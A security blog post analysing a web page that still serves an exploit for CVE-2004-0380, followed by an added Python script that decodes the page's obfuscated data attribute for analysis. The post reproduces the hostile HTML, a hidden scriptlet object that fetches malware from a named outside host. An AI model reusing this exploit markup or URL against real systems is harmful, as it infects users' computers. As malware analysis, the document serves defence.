Old exploit still kicking (CVE-2004-0380)

Some exploits just do not want to go away.

A case in point is an exploit for CVE-2004-0380 (yes, 2004!) that I recently found at hxxp://lixiaoxia.vhost008.cn/2.htm. The page is rather simple:

<html>
<OBJECT style="display:none;" type="text/x-scriptlet" 
  data="&#77&#75&#58&#64&#77&#83&#73&#84&#83&#116&#111&#114&#101&#58&#109
    &#104&#116&#109&#108&#58&#99&#58&#92&#46&#109&#104&#116&#33&#104&#116
    &#116&#112&#58&#47/http://lixiaoxia.vhost008.cn/logo.jpg ::/102%2E%68tm">
</OBJECT>
</body>
</html>

The object tag instantiates a scriptlet. A scriptlet is essentially a reusable object written as a regular web page in which scripts follow certain conventions. Think of ActiveX controls implemented in HTML and VB script. For the sake of historical completeness, scriptlets were introduced in Internet Explorer 4, deprecated in Internet Explorer 5, and disabled by default in Internet Explorer 7. Talk about a successful technology...

After decoding the HTML numeric character references, the data attribute of the scriptlet reveals the content MK:@MSITStore:mhtml:c:\.mht!http://http://lixiaoxia.vhost008.cn/logo.jpg ::/102.htm, which, on a vulnerable system, would cause the malware logo.gif to be downloaded to the victim's computer.
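The decoding step mentioned above, written out as an added Python example (this is not code from the original post): it pulls the data attribute out of the OBJECT tag shown earlier, resolves the semicolon-less numeric character references and the percent-encoded tail, and flags the protocol prefixes that make the decoded value worth an analyst's attention. The sample page is constructed from the snippet above; the function names and the watch-list of prefixes are my own assumptions.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample: the <OBJECT> tag from the post, with the data attribute
# wrapped across lines as it appears in the snippet above.
SAMPLE_PAGE = """<html>
<OBJECT style="display:none;" type="text/x-scriptlet"
  data="&#77&#75&#58&#64&#77&#83&#73&#84&#83&#116&#111&#114&#101&#58&#109
    &#104&#116&#109&#108&#58&#99&#58&#92&#46&#109&#104&#116&#33&#104&#116
    &#116&#112&#58&#47/http://lixiaoxia.vhost008.cn/logo.jpg ::/102%2E%68tm">
</OBJECT>
</body>
</html>
"""

# Decimal (&#77) or hexadecimal (&#x4D) numeric character reference. The
# trailing semicolon is optional because browsers tolerate its absence, which
# is exactly what the sample relies on to slip past naive string matching.
NUMERIC_REF = re.compile(r"&#([xX][0-9a-fA-F]+|[0-9]+);?")

# Hypothetical watch-list (assumed here, not from the post): protocol prefixes
# whose presence in a decoded OBJECT data attribute deserves a second look.
SUSPICIOUS_PREFIXES = {
    "MK:@MSITStore:": "ITS (compiled HTML help) protocol handler",
    "mhtml:": "MHTML protocol handler",
}


def extract_object_data(page: str) -> str:
    """Return the raw, still-encoded value of the first <OBJECT data="..."> attribute."""
    match = re.search(r'<object\b[^>]*?\bdata="([^"]*)"', page, re.IGNORECASE)
    if match is None:
        raise ValueError("no <OBJECT data=...> attribute found")
    # Remove line breaks and the indentation that follows them; ordinary
    # spaces inside the value (such as the one before '::/') are kept.
    return re.sub(r"\n\s*", "", match.group(1))


def decode_numeric_refs(text: str) -> str:
    """Replace every numeric character reference with the character it encodes."""
    def replace(match: re.Match) -> str:
        ref = match.group(1)
        code = int(ref[1:], 16) if ref[0] in "xX" else int(ref, 10)
        return chr(code)
    return NUMERIC_REF.sub(replace, text)


def matches_stdlib(page: str) -> bool:
    """Cross-check the hand-rolled decoder against html.unescape, which also
    accepts semicolon-less numeric references."""
    raw = extract_object_data(page)
    return decode_numeric_refs(raw) == html.unescape(raw)


def decode_data_attribute(page: str) -> dict:
    """Fully decode the attribute and pull out the pieces an analyst records."""
    raw = extract_object_data(page)
    # Two layers: HTML character references first, then the percent-encoding
    # that hides the final file name (102%2E%68tm -> 102.htm).
    decoded = unquote(decode_numeric_refs(raw))
    # Each URL runs until whitespace or until another scheme starts, so the
    # doubled 'http://http://' in the sample yields only the real URL.
    urls = re.findall(r"https?://(?:(?!https?://)\S)+", decoded)
    return {
        "raw": raw,
        "decoded": decoded,
        "indicators": [p for p in SUSPICIOUS_PREFIXES if p in decoded],
        "remote_url": urls[-1] if urls else None,
        "local_target": decoded.rsplit("::/", 1)[-1] if "::/" in decoded else None,
    }


if __name__ == "__main__":
    result = decode_data_attribute(SAMPLE_PAGE)
    print("decoded :", result["decoded"])
    print("remote  :", result["remote_url"])
    print("target  :", result["local_target"])
    for prefix in result["indicators"]:
        print("flag    :", prefix, "-", SUSPICIOUS_PREFIXES[prefix])
```

The hand-rolled decoder is kept deliberately explicit so the optional-semicolon rule is visible; in practice `html.unescape` from the standard library handles the same references, and `matches_stdlib` confirms the two agree on the sample.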

The malware logo.gif has surprisingly good detection on VirusTotal (34/41!). I wonder if it has also been around since 2004...
